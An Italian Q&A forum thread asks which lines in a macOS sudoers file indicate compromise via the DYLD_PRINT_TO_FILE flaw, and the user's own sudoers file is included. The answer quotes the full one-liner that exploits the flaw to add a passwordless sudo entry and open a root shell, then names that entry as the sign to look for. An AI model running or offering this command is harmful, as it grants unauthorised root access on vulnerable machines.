DYLD_PRINT_TO_FILE & sudoers Exploit: quali sono gli indicatori nel file sudoers?

Naviga le tue risposte
0

Sono preoccupato per l'exploit DYLD_PRINT_TO_FILE nel file sudoers.

link

Se ho il mio file sudoers aperto, quali sono i marker che dovrei cercare come segno di infezione? Il mio file sudoers è in realtà piuttosto piccolo e anche il mio occhio (per lo più inesperto), non vedo nulla che possa essere un problema. Ma quali sono alcuni esempi di linee / variabili che potrebbero indicare un problema?

Ecco la metà inferiore del mio file, niente mi salta fuori. Pensieri? 

# User privilege specification
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL

# Uncomment to allow people in group wheel to run all commands
# %wheel    ALL=(ALL) ALL

# Same thing without a password
# %wheel    ALL=(ALL) NOPASSWD: ALL

# Samples
# %users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
# %users  localhost=/sbin/shutdown -h now
    
posta Unknown Coder 05.08.2015 - 23:47
fonte

1 risposta

1

Questo è il comando che infetta: 

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Questo significa che avrai una riga come: 

USERNAME ALL=(ALL) NOPASSWD:ALL

alla fine del tuo file sudoers .

NOTA: USERNAME è il tuo nome utente nel sistema. Non avrà hash tag # davanti.

    
risposta data 06.08.2015 - 00:06
fonte

Leggi altre domande sui tag

start.command permesso negato anche dopo chmod Installa il file Yosemite